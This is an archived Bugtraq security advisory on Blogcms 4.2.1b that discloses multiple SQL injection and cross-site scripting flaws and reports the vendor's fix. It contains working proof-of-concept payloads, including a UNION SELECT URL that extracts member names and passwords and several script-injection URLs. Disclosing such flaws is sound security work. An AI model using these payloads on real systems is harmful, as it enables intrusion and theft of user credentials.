Login | Register For Free | Help
Search for: (Advanced)

Mailing List Archive: Bugtraq: Bugtraq

[DSECRG-08-003] blogcms 4.2.1b Multiple Security Vulnerabilities

 

 

Bugtraq bugtraq RSS feed   Index | Next | Previous | View Threaded


research at dsec

Jan 16, 2008, 3:02 AM

Post #1 of 1 (3194 views)
Permalink
[DSECRG-08-003] blogcms 4.2.1b Multiple Security Vulnerabilities

Digital Security Research Group [DSecRG] Advisory #DSECRG-08-003


Application: Blogcms
Versions Affected: Blogcms 4.2.1b
Vendor URL: http://blogcms.com/
Bugs: SQL Injestions, SiXSS, XSS
Exploits: YES
Reported: 15.01.2008
Vendor response: 16.01.2008
Date of Public Advisory: 16.01.2008
Authors: Alexandr Polyakov, Stas Svistunovich
Digital Security Reasearch Group [DSecRG] (research [at] dsec [dot] ru)



Description
***********

Blogcms system has multiple security vulnerabilities:

1. Multiple SQL Injections
2. Multiple Linked XSS
3. Multiple Linked SiXSS



Details
*******

1. Multiple SQL Injection vulnerabilities


1.1 Attacker can inject SQL code in index.php. Parameter name "blogid"


Example:

http://[server]/[installdir]/index.php?query=asd&blogid=1,1)+union+select+1,2,user(),database(),mname,6,7,8,9,10,11,mpassword,13,14,15+from+nucleus_member/*



1.2 Attacker can inject SQL code in module /blogcms/action.php. POST parameter name "user"


Example:

POST /blogcms/action.php HTTP/1.0
Cookie: DokuWiki=g8m41hncjkfjkc4sb1lvmgbiu5
Content-Length: 139
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; DS; .NET CLR 2.0.50727)
Host: 192.168.40.33
Pragma: no-cache
Connection: Keep-Alive

action=addcomment&url=http%3A%2F%2F192.168.40.33%2Fblogcms%2F%3Fitem%3Dblog-cms-4-2-1&itemid=1&body=asd&&userid=asd&x=42&y=13&user=asd'+[DSecRG_INJECTION]

-------------------------------------------------------------------------------


2. Multiple Linked XSS vulnerabilities

Linked XSS vulnerability found in /photo/admin.php and /photo/index.php attacker can inject XSS script in URL

Example:

http://[server]/[installdir]/photo/admin.php/"><script>alert('DSECRG_XSS')</script>

http://[server]/[installdir]/photo/index.php/"><script>alert('DSECRG_XSS')</script>



-------------------------------------------------------------------------------
3. Multiple SiXSS (XSS throught SQl Injection Error) vulnerabilities


3.1 Linked SiXSS vulnerability found in index.php, attacker can inject XSS code in SQL Error

Example:

http://[server]/[installdir]/index.php?query=asd&amount=0&blogid=1'<script>alert('DSecRG_XSS')</script>;&x=34&y=6



3.1 Linked SiXSS vulnerability found in /admin/plugins/table/index.php, attacker can inject XSS code in SQL Error

It is also a SQL injection but because it is in admin panel it is not critical.

Example:

http://[server]/[installdir]/admin/plugins/table/index.php?action=edittemplate&field=title'<script>a=/DSecRG XSS/%0d%0aalert(a.source)</script>&id=2&text=0

-------------------------------------------------------------------------------



Fix Information
***************

Blogcms was altered to fix this flaw on 16.01.2008. Updated version (4.2.1.c) can be downloaded here:

http://blogcms.com/?item=download

Changelog: http://blogcms.com/wiki/changelog



About
*****

Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.


Contact: research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)

Bugtraq bugtraq RSS feed   Index | Next | Previous | View Threaded
 
 


Interested in having your list archived? Contact Gossamer Threads
 
  Web Applications & Managed Hosting Powered by Gossamer Threads Inc.